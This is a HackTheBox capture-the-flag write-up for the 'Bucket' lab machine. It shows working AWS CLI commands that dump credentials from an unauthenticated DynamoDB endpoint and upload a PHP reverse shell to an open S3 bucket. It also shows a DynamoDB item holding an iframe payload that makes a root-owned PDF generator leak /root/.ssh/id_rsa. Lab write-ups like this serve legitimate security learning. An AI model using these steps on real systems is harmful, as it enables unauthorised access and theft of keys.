Bucket 10.10.10.212
No technology that's connected to the internet is unhackable. <Abhijit Naskar>
Background
Bucket is a Linux machine from HackTheBox, that is an Amazon Simple Storage Service (Amazon S3) bucket. This machine is required some basic knowledge on Amazon Cloud service, such as the AWS Command Line Interface (AWS CLI) and Database Service (DynamoDB) technique.
After basic enumeration, you would found that the host table should be updated to include two host name bucket.htb and s3.bucket.htb before further enumeration.
After used the web folder enumeration tools - gobuster, health page was found which shown dynamoDB service was set up and run. The tool AWS CLI would be used for enumerating the AWS S3 and the dynamoDB. You would found that no authentication required to enquiry the API. Finally, a database table named "users" was found and listed out three user credentials. It was very useful for later use
The AWS CLI could be used to enumerate the bucket folder structure and upload a reverse shell php file. After obtained the reverse shell, a user account named "roy" was found which could be login by the password found above. Got the user flag.
Logon with this "Roy" account, I found the port 8000 was opened for the localhost connection, which was pointed to the /var/www/bucket-app/. There is a PHP program owned by root, which used to print out a DB value to a PDF file. Making use of this program, the value of "/root/.ssh/id_rsa" SSH Private Key was output.
Using this Private Key ssh connect to the bucket.htb, root privilege was obtained.
130n@calvinlai.com
Target Machine: 10.10.10.212
Attacker Machine: 10.10.14.8
Hacking Process Part 0 – Service Scanning
Quick Pre-searching
Details Analysis
It was found that the service cannot be further enumerated. The port 80 was redirected to bucket.htb. Thus, updated the host table to include it.
Enumeration strategies
Check Website Vulnerability
Check any hidden files/folders of the website
Check the website
Hacking Process Part 1 – Enumeration
Visit the website and read the page source, it was found that the s3.bucket.htb should be included in the host table before further enumeration
Enumerating the folders at the websites
Using the gobust to check the http://s3.bucket.htb and http://bucket.htb. It was found that there are three hidden folders under s3.bucket.htb, while nothing special return from http://bucket.htb. I paid more attention to the s3.
When visited the health folder, a dynamodb used by AWS was found in running status
Enumerating the ASW environment S3.bucket.htb
Before starting, install the ASW command-line interface tool, and config
Enumerated the database dynamoDB
Reviewed the AWS document, we can query the table record using the following command, after "try and error", a table "Users" was identified and the list the value. However, those credentials cannot be login via SSH.
root@kclai:~/Documents/ctf/htb/linux/18-HTB-Bucket# aws dynamodb scan --table-name users --endpoint http://s3.bucket.htb/
{
"Items": [
{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
},
{
"password": {
"S": "Welcome123!"
},
"username": {
"S": "Cloudadm"
}
},
{
"password": {
"S": "n2vM-<_K_Q:.Aa2"
},
"username": {
"S": "Sysadm"
}
}
],
"Count": 3,
"ScannedCount": 3,
"ConsumedCapacity": null
}
Enumerated the site structure s3.bucket.htb
It does not require any login authentication on enquiry the site, I can list the folder structure and even copy the file. Thus, a reserved TCP shell file in PHP format was prepared and upload to the environment.
Hacking Process Part 2 – Gaining Foothold
Using the pentestmonkey, php-reverse-shell, and prepared the return netcat port. Uploading PHP reverse shell to the server using the command "aws --endpoint http://s3.bucket.htb/ s3 cp php-reverse-shell.php s3://adserver"
root@kclai:~/Documents/ctf/htb/linux/18-HTB-Bucket/exploit# aws --endpoint-url http://s3.bucket.htb/ s3 cp php-reverse-shell.php s3://adserver/
upload: ./php-reverse-shell.php to s3://adserver/php-reverse-shell.php
root@kclai:~/Documents/ctf/htb/linux/18-HTB-Bucket/exploit# aws --endpoint-url http://s3.bucket.htb/ s3 ls s3://adserver/
PRE images/
2020-12-27 01:03:03 5344 index.html
2020-12-27 01:03:52 1069 php-reverse-shell.php
root@kclai:~/Documents/ctf/htb/linux/18-HTB-Bucket/exploit# curl http://bucket.htb/php-reverse-shell.php
I tried to access my PHP file at http://bucket.htb/php-reverse-shell.php using curl to speed up the process. Finally, I got the reverse shell and start the enumeration again
It was found that the user flag was saved at Roy's home directory (/home/roy) which cannot be accessed by this "www" account. Now, the target is the Roy account.
There was a password list found above during enumerating the DynamoDB, tried to use those password to access the server via ssh. Finally, I got the password of Roy is "n2vM-<_K_Q:.Aa2"
root@kclai:~/Documents/ctf/htb/linux/18-HTB-Bucket/exploit# ssh roy@bucket.htb
roy@bucket.htb's password:
Permission denied, please try again.
roy@bucket.htb's password:
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-48-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 26 Dec 2020 05:16:15 PM UTC
System load: 0.03
Usage of /: 40.0% of 19.56GB
Memory usage: 20%
Swap usage: 0%
Processes: 189
Users logged in: 0
IPv4 address for br-bee97070fb20: 172.18.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for ens160: 10.10.10.212
IPv6 address for ens160: dead:beef::250:56ff:feb9:944d
91 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Wed Sep 23 03:33:53 2020 from 10.10.14.2
roy@bucket:~$Got the user flag
Hacking Process Part 3 – Privilege Escalation
Using the linPEAS to start the enumeration, it was found that there the server is listerning to some interesting port.... let try it one by one.
roy@bucket:~$ netstat -tunlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:4566 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:39035 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
The port 8000 returned an HTML page, after further enumeration on the source code, the document root should be the following path: /var/www/bucket-app/index.php
roy@bucket:/var/www/bucket-app$ ls -la
total 856
drwxr-x---+ 4 root root 4096 Sep 23 10:56 .
drwxr-xr-x 4 root root 4096 Sep 21 12:28 ..
-rw-r-x---+ 1 root root 63 Sep 23 02:23 composer.json
-rw-r-x---+ 1 root root 20533 Sep 23 02:23 composer.lock
drwxr-x---+ 2 root root 4096 Sep 23 03:29 files
-rwxr-x---+ 1 root root 17222 Sep 23 03:32 index.php
-rwxr-x---+ 1 root root 808729 Jun 10 11:50 pd4ml_demo.jar
drwxr-x---+ 10 root root 4096 Sep 23 02:23 vendor
roy@bucket:/var/www/bucket-app$ head -30 index.php
<?php
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;
if($_SERVER["REQUEST_METHOD"]==="POST") {
if($_POST["action"]==="get_alerts") {
date_default_timezone_set('America/New_York');
$client = new DynamoDbClient([
'profile' => 'default',
'region' => 'us-east-1',
'version' => 'latest',
'endpoint' => 'http://localhost:4566'
]);
$iterator = $client->getIterator('Scan', array(
'TableName' => 'alerts',
'FilterExpression' => "title = :title",
'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
));
foreach ($iterator as $item) {
$name=rand(1,10000).'.html';
file_put_contents('files/'.$name,$item["data"]);
}
passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
}
}
else
{
?>
Study on this Index.php
This PHP had the following functions:
It's looking for a POST request with data "get_alerts" (line 17 & 18)
Create a new DynamoDB client (line 28)
'Scan' for a table called alerts, then search for a title with the word "Ransomware"
Prints the data from that table into a PDF using Pd4Cmd
As the enumeration result of above, the "Alert" table does not exist. I am thinking that can I create this "alert" table and insert a record which I want.....
Create AWS Table - "Alert"
aws dynamodb create-table \
--table-name alerts \
--attribute-definitions \
AttributeName=title,AttributeType=S \
AttributeName=data,AttributeType=S \
--key-schema \
AttributeName=title,KeyType=HASH \
AttributeName=data,KeyType=RANGE \
--provisioned-throughput \
ReadCapacityUnits=10,WriteCapacityUnits=5 \
--endpoint-url \
http://s3.bucket.htbAdd a record to the Table
What value should I add? Read the root.txt (/root/root.txt) directly [ actually, tested, and submitted], but this is not the rules of the game. After googling, we can get the private key for the ssh login to gain the root access rights. Steal root ssh private key (/root/.ssh/id_rsa) is our objective.
aws dynamodb put-item \
--table-name alerts \
--item '{
"title": {"S": "Ransomware"},
"data": {"S": "<html><head></head><body><iframe src='/root/.ssh/id_rsa'></iframe></body></html>"}
}' \
--return-consumed-capacity TOTAL \
--endpoint-url http://s3.bucket.htb
Start the game
Steps:
Execute the command at my Kali machine to create the table
Execute the command at my Kali machine to add a record to the table
Visit the page :
curl --data "action=get_alerts"http://localhost:8000/SCP the result.pdf file to my Kali machine:
scp roy@$bucket.htb://var/www/bucket-app/files/result.pdf ./
The result.pdf: this is the private key of root SSH.
Get Root
1) Reformat the private cert and chmod to 600 at following: -rw------- 1 root root 2603 Dec 27 11:43 cert.ssh
2) ssh -i cert.ssh root@10.10.10.212
Conclusion
Server misconfiguration is the major problem on this box. The error was found on the AWS S3 setting, that does not apply any authentication control on the service API. It makes the attacker to enquiry the server and upload reserve shellcode easily.
Secondly, a plain text password was saved at the database table that made me gain the initial Foothold.
We shall review the system configuration before deployed to public cloud environment.
Reference
Last updated
Was this helpful?